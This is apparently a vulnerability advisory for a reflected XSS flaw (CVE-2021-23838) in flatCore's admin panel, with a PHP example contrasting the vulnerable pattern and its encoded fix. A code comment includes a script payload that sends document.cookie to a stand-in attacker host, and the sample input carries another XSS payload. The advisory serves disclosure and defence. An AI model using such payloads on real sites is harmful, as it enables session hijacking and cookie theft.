PT-2021-15559 · Flatcore · Flatcore

Published: 2021-01-15 · Updated: 2021-01-22 · CVE-2021-23838
CVSS v3.1: 4.8 (Medium)
Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: flatCore versions prior to 2.0.0 build 139
Description: A reflected cross-site scripting (XSS) issue was identified in the media filter parameter sent in the HTTP request body to the acp (admin control panel) interface. The parameter value is written back into the response without input validation or output encoding, so a crafted value is executed as client-side script in the browser of the user who submits the request. An attacker who induces a victim to submit such a request can steal the victim's session cookies and hijack the session, potentially gaining unauthorized access to the site.
Recommendations: For versions prior to 2.0.0 build 139, update to 2.0.0 build 139 or later. Until the update is applied, restrict access to the acp interface (and with it the media filter parameter) to trusted administrators, for example by network or authentication controls, to reduce the opportunity for exploitation; this limits exposure but does not remove the injection itself.
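As an added illustration of the bug class described above (this is neither flatCore's own code nor code from the advisory), the reflecting pattern is shown next to its hardened form. The form markup, the parameter name `filter`, the helper names and the sample request body are assumptions constructed for this example:

```php
<?php
// Added example for CVE-2021-23838's bug class: a POST parameter reflected into
// an HTML attribute without encoding. Not flatCore's code; the parameter name
// "filter", the form markup and the sample request body below are assumptions.

declare(strict_types=1);

// Vulnerable pattern: the filter value from the request body is concatenated
// straight into the page. A value such as
//   "><script>new Image().src='https://attacker.example/?c='+document.cookie</script>
// closes the value attribute and runs in the browser of whoever submits it.
function render_media_filter_vulnerable(array $post): string
{
    $filter = (string)($post['filter'] ?? '');
    return '<form method="post">'
         . '<input type="text" name="filter" value="' . $filter . '">'
         . '<button type="submit">Filter</button></form>';
}

// Hardened pattern: encode at the point of output for the HTML attribute
// context. ENT_QUOTES also encodes single quotes, ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string, and the charset is
// stated explicitly rather than inherited from default_charset.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_media_filter_fixed(array $post): string
{
    $filter = (string)($post['filter'] ?? '');
    return '<form method="post">'
         . '<input type="text" name="filter" value="' . e($filter) . '">'
         . '<button type="submit">Filter</button></form>';
}

// Defence in depth against the cookie-theft impact described in the advisory:
// HttpOnly keeps document.cookie from reading the session cookie, SameSite and
// Secure narrow how it travels. This does not stop the script from running.
function harden_session_cookie(): bool
{
    return session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed sample request body standing in for $_POST.
$samplePost = ['filter' => '"><script>alert(document.cookie)</script>'];

$vuln  = render_media_filter_vulnerable($samplePost);
$fixed = render_media_filter_fixed($samplePost);

// Self-check: the vulnerable output carries a live <script> element, the fixed
// output carries the payload only as encoded text.
assert(str_contains($vuln, '<script>'));
assert(!str_contains($fixed, '<script>'));
assert(str_contains($fixed, '&quot;&gt;&lt;script&gt;'));
assert(harden_session_cookie());

echo "vulnerable: $vuln\n";
echo "fixed:      $fixed\n";
```

Run with PHP 8.0 or later (`str_contains`). The fix is the output encoding where the value lands in the attribute; the cookie flags only shrink the session-hijacking impact and are no substitute for updating to 2.0.0 build 139 or later.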

References: Exploit · Fix
Tags: XSS


Weakness Enumeration: (not listed)
Related Identifiers: CVE-2021-23838
Affected Products: Flatcore